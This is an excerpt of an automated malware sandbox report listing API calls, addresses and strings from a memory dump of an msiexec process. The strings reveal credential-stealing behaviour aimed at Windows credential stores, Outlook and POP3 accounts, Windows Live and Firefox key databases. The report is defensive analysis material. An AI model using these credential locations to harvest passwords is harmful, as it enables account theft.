                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                        • wcslen.MSVCRT ref: 0040874A
                                                                                        • wcsncmp.MSVCRT ref: 00408794
                                                                                        • memset.MSVCRT ref: 0040882A
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                        • wcschr.MSVCRT ref: 0040889F
                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                        • String ID: J$Microsoft_WinInet
                                                                                        • API String ID: 3318079752-260894208
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                          • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                          • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                        • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                        • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                        • API String ID: 3718511928-2409096184
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004037EB
                                                                                        • memset.MSVCRT ref: 004037FF
                                                                                          • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                        • strchr.MSVCRT ref: 0040386E
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                        • strlen.MSVCRT ref: 00403897
                                                                                        • sprintf.MSVCRT ref: 004038B7
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                        • String ID: %s@yahoo.com
                                                                                        • API String ID: 2240714685-3288273942
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,?), ref: 004108C3
                                                                                        • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                        • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                        Strings
                                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                        Similarity
                                                                                        • API ID: FreeFromStringTaskUuidmemcpy
                                                                                        • String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
                                                                                        • API String ID: 2208953623-202910704
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                        • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                        • API String ID: 2780580303-317687271
                                                                                        APIs
                                                                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                        • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                        • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                          • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                        APIs
                                                                                        Strings
                                                                                        • out of memory, xrefs: 0042EBEF
                                                                                        • too many attached databases - max %d, xrefs: 0042E951
                                                                                        • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                        • unable to open database: %s, xrefs: 0042EBD6
                                                                                        • database is already attached, xrefs: 0042EA97
                                                                                        • database %s is already in use, xrefs: 0042E9CE
                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00402C9D
                                                                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                        • memset.MSVCRT ref: 00402CF7
                                                                                        • sprintf.MSVCRT ref: 00402D10
                                                                                        • sprintf.MSVCRT ref: 00402D4E
                                                                                          • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memset$sprintf$Enum
                                                                                        • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                        APIs
                                                                                          • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                        • strchr.MSVCRT ref: 0040327B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringstrchr
                                                                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                        • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                        • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040F567
                                                                                        • memset.MSVCRT ref: 0040F57F
                                                                                          • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                        • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                        • memset.MSVCRT ref: 0040FA1E
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                        • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                        • String ID: WindowsLive:name=*$windowslive:name=
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040F84A
                                                                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                        • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                        • String ID: Creds$ps:password
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$sprintfstrchrstrlen
                                                                                        • String ID: %s@gmail.com
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004094C8
                                                                                        • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                        • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                        • memset.MSVCRT ref: 0040950C
                                                                                        • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                        • _strcmpi.MSVCRT ref: 00409531
                                                                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                        • String ID: sysdatetimepick32
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403504
                                                                                        • memset.MSVCRT ref: 0040351A
                                                                                        • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                        • _mbscat.MSVCRT ref: 0040356D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _mbscatmemset$_mbscpystrlen
                                                                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                        • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                        • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                          • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                          • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                          • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                        • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$DialogMessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2485852401-0
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                        • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                        • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                        • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                        • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                        • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                        • String ID:
                                                                                        • API String ID: 3642520215-0
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                        • memset.MSVCRT ref: 00405C3B
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                        • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2313361498-0
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                        • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                        • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Defer$Rect$BeginClient
                                                                                        • String ID:
                                                                                        • API String ID: 2126104762-0
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                        • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                        • GetDC.USER32(00000000), ref: 004072FB
                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                        • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                        • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                        • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                        • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1999381814-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                        • API String ID: 1297977491-3883738016
                                                                                        APIs
                                                                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: gj
                                                                                        • API String ID: 438689982-4203073231
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm$__aullrem
                                                                                        • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                        • API String ID: 643879872-978417875
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040DAE3
                                                                                        • memset.MSVCRT ref: 0040DAF7
                                                                                        • memset.MSVCRT ref: 0040DB0B
                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset$strlen$_memicmp
                                                                                        • String ID: user_pref("
                                                                                        • API String ID: 765841271-2487180061
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                        • memset.MSVCRT ref: 004058C3
                                                                                        • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                        • SetFocus.USER32(?), ref: 00405976
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                        • String ID:
                                                                                        • API String ID: 4281309102-0
                                                                                        APIs
                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                        • _mbscat.MSVCRT ref: 0040A8FF
                                                                                        • sprintf.MSVCRT ref: 0040A921
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite_mbscatsprintfstrlen
                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                        • API String ID: 1631269929-4153097237
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040810E
                                                                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,68127B60,?), ref: 004081B9
                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                        • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00406B8E
                                                                                        • strlen.MSVCRT ref: 00406B99
                                                                                        • strlen.MSVCRT ref: 00406BFF
                                                                                        • strlen.MSVCRT ref: 00406C0D
                                                                                        • strlen.MSVCRT ref: 00406BA7
                                                                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$_mbscat_mbscpymemset
                                                                                        • String ID: key3.db$key4.db
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                        • String ID: 0$6
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004076D7
                                                                                        • sprintf.MSVCRT ref: 00407704
                                                                                        • strlen.MSVCRT ref: 00407710
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                        • strlen.MSVCRT ref: 00407733
                                                                                        • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpystrlen$memsetsprintf
                                                                                        • String ID: %s (%s)
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscat$memsetsprintf
